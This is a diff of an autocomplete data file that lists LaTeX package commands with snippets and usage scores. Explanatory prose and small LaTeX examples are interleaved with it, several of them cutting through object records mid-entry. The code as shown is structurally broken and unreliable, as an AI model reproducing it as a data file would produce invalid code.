caption: '\\makelabel[]{}', + snippet: '\\makelabel[$1]{$2}', + meta: 'enumerate-cmd', + score: 5.739925426740175e-5, + }, + ], + pdfpages: [ + { + caption: '\\csname', + snippet: '\\csname', + meta: 'pdfpages-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\addcontentsline{}{}{}', + snippet: '\\addcontentsline{$1}{$2}{$3}', + meta: 'pdfpages-cmd', + score: 0.07503475348393239, + }, + { + caption: '\\includegraphics[]{}', + snippet: '\\includegraphics[$1]{$2}', + meta: 'pdfpages-cmd', + score: 1.4595731795525781, + }, + { + caption: '\\includepdf[]{}', + snippet: '\\includepdf[$1]{$2}', + meta: 'pdfpages-cmd', + score: 0.023931732745590156, + }, + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'pdfpages-cmd', + score: 0.00037306820619479756, + }, + { + caption: '\\addtocounter{}{}', + snippet: '\\addtocounter{$1}{$2}', + meta: 'pdfpages-cmd', + score: 0.010241823778997489, + }, + { + caption: '\\setlength{}{}', + snippet: '\\setlength{$1}{$2}', + meta: 'pdfpages-cmd', + score: 0.354445763583904, + }, + { + caption: '\\setlength', + snippet: '\\setlength', + meta: 'pdfpages-cmd', + score: 0.354445763583904, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'pdfpages-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'pdfpages-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\stepcounter{}', + snippet: '\\stepcounter{$1}', + meta: 'pdfpages-cmd', + score: 0.0030745841706804776, + }, + { + caption: '\\setcounter{}{}', + snippet: '\\setcounter{$1}{$2}', + meta: 'pdfpages-cmd', + score: 0.10068045662118841, + }, + { + caption: '\\addtolength{}{}', + snippet: '\\addtolength{$1}{$2}', + meta: 'pdfpages-cmd', + score: 0.028955796305270766, + }, + { + caption: '\\addtolength', + snippet: '\\addtolength', + meta: 'pdfpages-cmd', + score: 0.028955796305270766, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'pdfpages-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'pdfpages-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'pdfpages-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\AtBeginShipout{}', + snippet: '\\AtBeginShipout{$1}', + meta: 'pdfpages-cmd', + score: 0.00047530324346933345, + }, + { + caption: '\\AtBeginShipoutNext{}', + snippet: '\\AtBeginShipoutNext{$1}', + meta: 'pdfpages-cmd', + score: 0.0005277905480209891, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'pdfpages-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\AddToShipoutPictureFG{}', + snippet: '\\AddToShipoutPictureFG{$1}', + meta: 'pdfpages-cmd', + score: 0.000325977535138643, + }, + { + caption: '\\AddToShipoutPictureBG{}', + snippet: '\\AddToShipoutPictureBG{$1}', + meta: 'pdfpages-cmd', + score: 0.0008957666085644653, + }, + { + caption: '\\AtPageUpperLeft{}', + snippet: '\\AtPageUpperLeft{$1}', + meta: 'pdfpages-cmd', + score: 0.0003608141410278152, + }, + { + caption: '\\LenToUnit{}', + snippet: '\\LenToUnit{$1}', + meta: 'pdfpages-cmd', + score: 0.0007216282820556304, + }, + { + caption: '\\AddToShipoutPicture{}', + snippet: '\\AddToShipoutPicture{$1}', + meta: 'pdfpages-cmd', + score: 0.0017658629469099734, + }, + { + caption: '\\ifthenelse{}{}{}', + snippet: '\\ifthenelse{$1}{$2}{$3}', + meta: 'pdfpages-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\ifthenelse{}', + snippet: '\\ifthenelse{$1}', + 
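
The enumerate block above exposes only \makelabel, the internal hook the package redefines; the user-facing feature is its extended optional argument. A minimal sketch:

    \documentclass{article}
    \usepackage{enumerate}
    \begin{document}
    \begin{enumerate}[(i)]  % the token i selects roman labels: (i), (ii), ...
      \item first point
      \item second point
    \end{enumerate}
    \end{document}
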
meta: 'pdfpages-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\setboolean{}{}', + snippet: '\\setboolean{$1}{$2}', + meta: 'pdfpages-cmd', + score: 0.0012203054938872515, + }, + { + caption: '\\newboolean{}', + snippet: '\\newboolean{$1}', + meta: 'pdfpages-cmd', + score: 0.0009170966832172938, + }, + { + caption: '\\value{}', + snippet: '\\value{$1}', + meta: 'pdfpages-cmd', + score: 0.01590723355124104, + }, + { + caption: '\\boolean{}', + snippet: '\\boolean{$1}', + meta: 'pdfpages-cmd', + score: 0.0018957469739775527, + }, + ], + epstopdf: [ + { + caption: '\\csname', + snippet: '\\csname', + meta: 'epstopdf-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'epstopdf-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\AppendGraphicsExtensions{}', + snippet: '\\AppendGraphicsExtensions{$1}', + meta: 'epstopdf-cmd', + score: 7.723677706376668e-5, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'epstopdf-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'epstopdf-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'epstopdf-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\check{}', + snippet: '\\check{$1}', + meta: 'epstopdf-cmd', + score: 0.0058342578961340175, + }, + { + caption: '\\space', + snippet: '\\space', + meta: 'epstopdf-cmd', + score: 0.023010789853665694, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'epstopdf-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'epstopdf-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'epstopdf-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'epstopdf-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'epstopdf-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\epstopdfsetup{}', + snippet: '\\epstopdfsetup{$1}', + meta: 'epstopdf-cmd', + score: 0.0009941134326203623, + }, + { + caption: '\\epstopdfDeclareGraphicsRule{}{}{}{}', + snippet: '\\epstopdfDeclareGraphicsRule{$1}{$2}{$3}{$4}', + meta: 'epstopdf-cmd', + score: 7.723677706376668e-5, + }, + { + caption: '\\OutputFile', + snippet: '\\OutputFile', + meta: 'epstopdf-cmd', + score: 7.723677706376668e-5, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'epstopdf-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'epstopdf-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'epstopdf-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'epstopdf-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'epstopdf-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'epstopdf-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'epstopdf-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'epstopdf-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'epstopdf-cmd', + score: 0.008565354665444157, + }, + ], + lmodern: [ + { + caption: '\\rmdefault', + snippet: '\\rmdefault', + 
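
pdfpages' own command in the list above is \includepdf[]{}; the rest are counter, length, and shipout helpers it re-exports, and the epstopdf block that follows is similar. A minimal sketch of both, with appendix.pdf as a hypothetical input file:

    \documentclass{article}
    \usepackage{pdfpages}
    \usepackage{epstopdf}   % converts legacy .eps graphics to .pdf
    \epstopdfsetup{update}  % catalogued: \epstopdfsetup{}; reconvert only when stale
    \begin{document}
    % pull pages 1-3 of a hypothetical appendix.pdf, slightly scaled down
    \includepdf[pages=1-3, scale=0.9]{appendix}  % catalogued: \includepdf[]{}
    \end{document}
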
meta: 'lmodern-cmd', + score: 0.0012870877747432935, + }, + { + caption: '\\sfdefault', + snippet: '\\sfdefault', + meta: 'lmodern-cmd', + score: 0.008427383388519996, + }, + { + caption: '\\sfdefault{}', + snippet: '\\sfdefault{$1}', + meta: 'lmodern-cmd', + score: 0.008427383388519996, + }, + ], + pifont: [ + { + caption: '\\ding{}', + snippet: '\\ding{$1}', + meta: 'pifont-cmd', + score: 0.009992300665793867, + }, + ], + ragged2e: [ + { + caption: '\\justifying', + snippet: '\\justifying', + meta: 'ragged2e-cmd', + score: 0.010373702256548788, + }, + { + caption: '\\justifying{}', + snippet: '\\justifying{$1}', + meta: 'ragged2e-cmd', + score: 0.010373702256548788, + }, + { + caption: '\\RaggedRight', + snippet: '\\RaggedRight', + meta: 'ragged2e-cmd', + score: 0.001021021782267457, + }, + { + caption: '\\Centering', + snippet: '\\Centering', + meta: 'ragged2e-cmd', + score: 0.00037395241488843035, + }, + { + caption: '\\selectfont', + snippet: '\\selectfont', + meta: 'ragged2e-cmd', + score: 0.04598628699063736, + }, + ], + rotating: [ + { + caption: '\\csname', + snippet: '\\csname', + meta: 'rotating-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'rotating-cmd', + score: 0.00037306820619479756, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'rotating-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'rotating-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\scalebox{}{}', + snippet: '\\scalebox{$1}{$2}', + meta: 'rotating-cmd', + score: 0.015973401906548487, + }, + { + caption: '\\reflectbox{}', + snippet: '\\reflectbox{$1}', + meta: 'rotating-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\reflectbox', + snippet: '\\reflectbox', + meta: 'rotating-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\resizebox{}{}{}', + snippet: '\\resizebox{$1}{$2}{$3}', + meta: 'rotating-cmd', + score: 0.017834153815870245, + }, + { + caption: '\\includegraphics[]{}', + snippet: '\\includegraphics[$1]{$2}', + meta: 'rotating-cmd', + score: 1.4595731795525781, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'rotating-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\DeclareGraphicsExtensions{}', + snippet: '\\DeclareGraphicsExtensions{$1}', + meta: 'rotating-cmd', + score: 0.0055519509468004175, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'rotating-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\graphicspath{}', + snippet: '\\graphicspath{$1}', + meta: 'rotating-cmd', + score: 0.09973951908678011, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'rotating-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'rotating-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'rotating-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\DeclareGraphicsRule{}{}{}{}', + snippet: '\\DeclareGraphicsRule{$1}{$2}{$3}{$4}', + meta: 'rotating-cmd', + score: 0.004649150613625593, + }, + { + caption: '\\ifthenelse{}{}{}', + snippet: '\\ifthenelse{$1}{$2}{$3}', + meta: 'rotating-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\ifthenelse{}', + snippet: '\\ifthenelse{$1}', + meta: 'rotating-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\setboolean{}{}', + snippet: 
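
pifont contributes a single completion, \ding{}, and ragged2e a handful of justification switches. A minimal sketch combining them (51 and 55 are the Zapf Dingbats check and cross marks):

    \documentclass{article}
    \usepackage{pifont}
    \usepackage{ragged2e}
    \begin{document}
    \RaggedRight                            % catalogued: \RaggedRight
    \ding{51} done \quad \ding{55} pending  % catalogued: \ding{}
    \justifying                             % catalogued: \justifying
    \end{document}
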
'\\setboolean{$1}{$2}', + meta: 'rotating-cmd', + score: 0.0012203054938872515, + }, + { + caption: '\\newboolean{}', + snippet: '\\newboolean{$1}', + meta: 'rotating-cmd', + score: 0.0009170966832172938, + }, + { + caption: '\\value{}', + snippet: '\\value{$1}', + meta: 'rotating-cmd', + score: 0.01590723355124104, + }, + { + caption: '\\boolean{}', + snippet: '\\boolean{$1}', + meta: 'rotating-cmd', + score: 0.0018957469739775527, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'rotating-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'rotating-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'rotating-cmd', + score: 0.004719094298848707, + }, + ], + xltxtra: [ + { + caption: '\\textsubscript{}', + snippet: '\\textsubscript{$1}', + meta: 'xltxtra-cmd', + score: 0.058405875394131175, + }, + { + caption: '\\textsuperscript{}', + snippet: '\\textsuperscript{$1}', + meta: 'xltxtra-cmd', + score: 0.05216393882408519, + }, + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'xltxtra-cmd', + score: 0.00037306820619479756, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'xltxtra-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'xltxtra-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'xltxtra-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'xltxtra-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\RequireXeTeX', + snippet: '\\RequireXeTeX', + meta: 'xltxtra-cmd', + score: 0.00021116765384691477, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'xltxtra-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'xltxtra-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\scalebox{}{}', + snippet: '\\scalebox{$1}{$2}', + meta: 'xltxtra-cmd', + score: 0.015973401906548487, + }, + { + caption: '\\reflectbox{}', + snippet: '\\reflectbox{$1}', + meta: 'xltxtra-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\reflectbox', + snippet: '\\reflectbox', + meta: 'xltxtra-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\resizebox{}{}{}', + snippet: '\\resizebox{$1}{$2}{$3}', + meta: 'xltxtra-cmd', + score: 0.017834153815870245, + }, + { + caption: '\\includegraphics[]{}', + snippet: '\\includegraphics[$1]{$2}', + meta: 'xltxtra-cmd', + score: 1.4595731795525781, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'xltxtra-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\DeclareGraphicsExtensions{}', + snippet: '\\DeclareGraphicsExtensions{$1}', + meta: 'xltxtra-cmd', + score: 0.0055519509468004175, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'xltxtra-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\graphicspath{}', + snippet: '\\graphicspath{$1}', + meta: 'xltxtra-cmd', + score: 0.09973951908678011, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'xltxtra-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'xltxtra-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 
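
Most of the rotating entries above are graphicx commands the package re-exports; its own contribution is rotated material and sideways floats. A minimal sketch, with plot.pdf as a hypothetical graphic:

    \documentclass{article}
    \usepackage{rotating}  % loads graphicx; adds sideways* environments
    \begin{document}
    \rotatebox{90}{a rotated label}  % catalogued: \rotatebox{}{}
    \begin{sidewaysfigure}
      \centering
      \includegraphics[width=.5\textwidth]{plot}  % catalogued: \includegraphics[]{}
      \caption{A figure turned onto its own landscape page.}
    \end{sidewaysfigure}
    \end{document}
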
'xltxtra-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\DeclareGraphicsRule{}{}{}{}', + snippet: '\\DeclareGraphicsRule{$1}{$2}{$3}{$4}', + meta: 'xltxtra-cmd', + score: 0.004649150613625593, + }, + { + caption: '\\XeTeX', + snippet: '\\XeTeX', + meta: 'xltxtra-cmd', + score: 0.0010635559050357936, + }, + { + caption: '\\TeX', + snippet: '\\TeX', + meta: 'xltxtra-cmd', + score: 0.02873756018238537, + }, + { + caption: '\\TeX{}', + snippet: '\\TeX{$1}', + meta: 'xltxtra-cmd', + score: 0.02873756018238537, + }, + { + caption: '\\LaTeX', + snippet: '\\LaTeX', + meta: 'xltxtra-cmd', + score: 0.2334089308452787, + }, + { + caption: '\\LaTeX{}', + snippet: '\\LaTeX{$1}', + meta: 'xltxtra-cmd', + score: 0.2334089308452787, + }, + { + caption: '\\XeLaTeX', + snippet: '\\XeLaTeX', + meta: 'xltxtra-cmd', + score: 0.002009786035379175, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'xltxtra-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\color[]{}', + snippet: '\\color[$1]{$2}', + meta: 'xltxtra-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\color{}', + snippet: '\\color{$1}', + meta: 'xltxtra-cmd', + score: 0.2864294797053033, + }, + ], + marvosym: [ + { + caption: '\\Mundus', + snippet: '\\Mundus', + meta: 'marvosym-cmd', + score: 0.0006349134235582933, + }, + { + caption: '\\Telefon', + snippet: '\\Telefon', + meta: 'marvosym-cmd', + score: 0.0003618274070138519, + }, + { + caption: '\\Letter', + snippet: '\\Letter', + meta: 'marvosym-cmd', + score: 0.0012281130571092198, + }, + { + caption: '\\Mobilefone', + snippet: '\\Mobilefone', + meta: 'marvosym-cmd', + score: 0.0005432037068220953, + }, + ], + dcolumn: [ + { + caption: '\\endtabular', + snippet: '\\endtabular', + meta: 'dcolumn-cmd', + score: 0.0005078239917067089, + }, + { + caption: '\\multicolumn{}{}{}', + snippet: '\\multicolumn{$1}{$2}{$3}', + meta: 'dcolumn-cmd', + score: 0.5473606021405326, + }, + { + caption: '\\array{}', + snippet: '\\array{$1}', + meta: 'dcolumn-cmd', + score: 2.650484574842396e-5, + }, + { + caption: '\\arraybackslash', + snippet: '\\arraybackslash', + meta: 'dcolumn-cmd', + score: 0.014532521139459619, + }, + { + caption: '\\tabular{}', + snippet: '\\tabular{$1}', + meta: 'dcolumn-cmd', + score: 0.0005078239917067089, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'dcolumn-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\newcolumntype{}[]{}', + snippet: '\\newcolumntype{$1}[$2]{$3}', + meta: 'dcolumn-cmd', + score: 0.018615449342361392, + }, + { + caption: '\\newcolumntype{}{}', + snippet: '\\newcolumntype{$1}{$2}', + meta: 'dcolumn-cmd', + score: 0.018615449342361392, + }, + ], + xspace: [ + { + caption: '\\xspace', + snippet: '\\xspace', + meta: 'xspace-cmd', + score: 0.07560370351316588, + }, + ], + xunicode: [ + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'xunicode-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'xunicode-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'xunicode-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'xunicode-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\scalebox{}{}', + snippet: '\\scalebox{$1}{$2}', + meta: 'xunicode-cmd', + score: 0.015973401906548487, + }, + { + caption: '\\reflectbox{}', + snippet: '\\reflectbox{$1}', + meta: 'xunicode-cmd', + score: 
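
dcolumn's key completion above is \newcolumntype{}[]{}; its D column spec aligns numbers on the decimal point. A minimal sketch:

    \documentclass{article}
    \usepackage{dcolumn}
    % D{input sep}{output sep}{decimal places}; #1 passes the precision through
    \newcolumntype{d}[1]{D{.}{.}{#1}}
    \begin{document}
    \begin{tabular}{l d{2}}
      item  & \multicolumn{1}{c}{value} \\  % catalogued: \multicolumn{}{}{}
      alpha & 1.25 \\
      beta  & 12.5 \\
    \end{tabular}
    \end{document}
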
0.0005981923692899367, + }, + { + caption: '\\reflectbox', + snippet: '\\reflectbox', + meta: 'xunicode-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\resizebox{}{}{}', + snippet: '\\resizebox{$1}{$2}{$3}', + meta: 'xunicode-cmd', + score: 0.017834153815870245, + }, + { + caption: '\\includegraphics[]{}', + snippet: '\\includegraphics[$1]{$2}', + meta: 'xunicode-cmd', + score: 1.4595731795525781, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'xunicode-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\DeclareGraphicsExtensions{}', + snippet: '\\DeclareGraphicsExtensions{$1}', + meta: 'xunicode-cmd', + score: 0.0055519509468004175, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'xunicode-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\graphicspath{}', + snippet: '\\graphicspath{$1}', + meta: 'xunicode-cmd', + score: 0.09973951908678011, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'xunicode-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'xunicode-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'xunicode-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\DeclareGraphicsRule{}{}{}{}', + snippet: '\\DeclareGraphicsRule{$1}{$2}{$3}{$4}', + meta: 'xunicode-cmd', + score: 0.004649150613625593, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'xunicode-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'xunicode-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'xunicode-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'xunicode-cmd', + score: 0.00037306820619479756, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'xunicode-cmd', + score: 0.008565354665444157, + }, + ], + csquotes: [ + { + caption: '\\mkcitation', + snippet: '\\mkcitation', + meta: 'csquotes-cmd', + score: 3.7048287721105874e-5, + }, + { + caption: '\\DeclareQuoteAlias{}{}', + snippet: '\\DeclareQuoteAlias{$1}{$2}', + meta: 'csquotes-cmd', + score: 0.0004906235524176374, + }, + { + caption: '\\quote{}', + snippet: '\\quote{$1}', + meta: 'csquotes-cmd', + score: 0.030690393112264815, + }, + { + caption: '\\quote', + snippet: '\\quote', + meta: 'csquotes-cmd', + score: 0.030690393112264815, + }, + { + caption: '\\setquotestyle[]{}', + snippet: '\\setquotestyle[$1]{$2}', + meta: 'csquotes-cmd', + score: 3.7048287721105874e-5, + }, + { + caption: '\\blockquote{}', + snippet: '\\blockquote{$1}', + meta: 'csquotes-cmd', + score: 0.00023365626458085812, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'csquotes-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'csquotes-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\mkbegdispquote', + snippet: '\\mkbegdispquote', + meta: 'csquotes-cmd', + score: 4.203362017075738e-5, + }, + { + caption: '\\do', + snippet: '\\do', + meta: 'csquotes-cmd', + score: 0.009278344180101056, + }, + { + caption: '\\break', + snippet: '\\break', + meta: 'csquotes-cmd', + score: 0.016352452390960115, + }, + { + caption: '\\break{}', + snippet: '\\break{$1}', + meta: 'csquotes-cmd', + score: 0.016352452390960115, + }, + 
{ + caption: '\\break{}{}', + snippet: '\\break{$1}{$2}', + meta: 'csquotes-cmd', + score: 0.016352452390960115, + }, + { + caption: '\\ifpunctmark{}', + snippet: '\\ifpunctmark{$1}', + meta: 'csquotes-cmd', + score: 7.723677706376668e-5, + }, + { + caption: '\\endquote', + snippet: '\\endquote', + meta: 'csquotes-cmd', + score: 3.7048287721105874e-5, + }, + { + caption: '\\par', + snippet: '\\par', + meta: 'csquotes-cmd', + score: 0.413853376001159, + }, + { + caption: '\\DeclareQuoteStyle[]{}', + snippet: '\\DeclareQuoteStyle[$1]{$2}', + meta: 'csquotes-cmd', + score: 3.7048287721105874e-5, + }, + { + caption: '\\SetBlockEnvironment{}', + snippet: '\\SetBlockEnvironment{$1}', + meta: 'csquotes-cmd', + score: 3.7048287721105874e-5, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'csquotes-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\MakeOuterQuote{}', + snippet: '\\MakeOuterQuote{$1}', + meta: 'csquotes-cmd', + score: 0.0019170811203505262, + }, + { + caption: '\\enquote{}', + snippet: '\\enquote{$1}', + meta: 'csquotes-cmd', + score: 0.0077432730806830915, + }, + { + caption: '\\SetCiteCommand{}', + snippet: '\\SetCiteCommand{$1}', + meta: 'csquotes-cmd', + score: 3.7048287721105874e-5, + }, + { + caption: '\\robustify{}', + snippet: '\\robustify{$1}', + meta: 'csquotes-cmd', + score: 0.002671974990314091, + }, + { + caption: '\\setbool{}{}', + snippet: '\\setbool{$1}{$2}', + meta: 'csquotes-cmd', + score: 0.00023171033119130004, + }, + { + caption: '\\ifdefempty{}{}{}', + snippet: '\\ifdefempty{$1}{$2}{$3}', + meta: 'csquotes-cmd', + score: 7.482069221111606e-5, + }, + { + caption: '\\apptocmd{}{}{}{}', + snippet: '\\apptocmd{$1}{$2}{$3}{$4}', + meta: 'csquotes-cmd', + score: 0.00035805058319299113, + }, + { + caption: '\\ifstrequal{}{}{}{}', + snippet: '\\ifstrequal{$1}{$2}{$3}{$4}', + meta: 'csquotes-cmd', + score: 0.00041307691354437894, + }, + { + caption: '\\ifstrequal{}{}{}', + snippet: '\\ifstrequal{$1}{$2}{$3}', + meta: 'csquotes-cmd', + score: 0.00041307691354437894, + }, + { + caption: '\\string', + snippet: '\\string', + meta: 'csquotes-cmd', + score: 0.001042697111754002, + }, + { + caption: '\\csedef{}{}', + snippet: '\\csedef{$1}{$2}', + meta: 'csquotes-cmd', + score: 0.00014933999190577243, + }, + { + caption: '\\do', + snippet: '\\do', + meta: 'csquotes-cmd', + score: 0.009278344180101056, + }, + { + caption: '\\newrobustcmd{}[]{}', + snippet: '\\newrobustcmd{$1}[$2]{$3}', + meta: 'csquotes-cmd', + score: 0.0006607703576475988, + }, + { + caption: '\\ifdefstring{}{}{}{}', + snippet: '\\ifdefstring{$1}{$2}{$3}{$4}', + meta: 'csquotes-cmd', + score: 0.0006796212875843042, + }, + { + caption: '\\ifbool{}{}{}', + snippet: '\\ifbool{$1}{$2}{$3}', + meta: 'csquotes-cmd', + score: 7.723677706376668e-5, + }, + { + caption: '\\patchcmd{}{}{}{}{}', + snippet: '\\patchcmd{$1}{$2}{$3}{$4}{$5}', + meta: 'csquotes-cmd', + score: 0.002560998917940627, + }, + { + caption: '\\patchcmd', + snippet: '\\patchcmd', + meta: 'csquotes-cmd', + score: 0.002560998917940627, + }, + { + caption: '\\preto{}{}', + snippet: '\\preto{$1}{$2}', + meta: 'csquotes-cmd', + score: 8.860754525300578e-5, + }, + { + caption: '\\ifnumcomp{}{}{}{}{}', + snippet: '\\ifnumcomp{$1}{$2}{$3}{$4}{$5}', + meta: 'csquotes-cmd', + score: 0.00029867998381154486, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'csquotes-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\newbool{}', + snippet: '\\newbool{$1}', + meta: 'csquotes-cmd', + score: 7.723677706376668e-5, + 
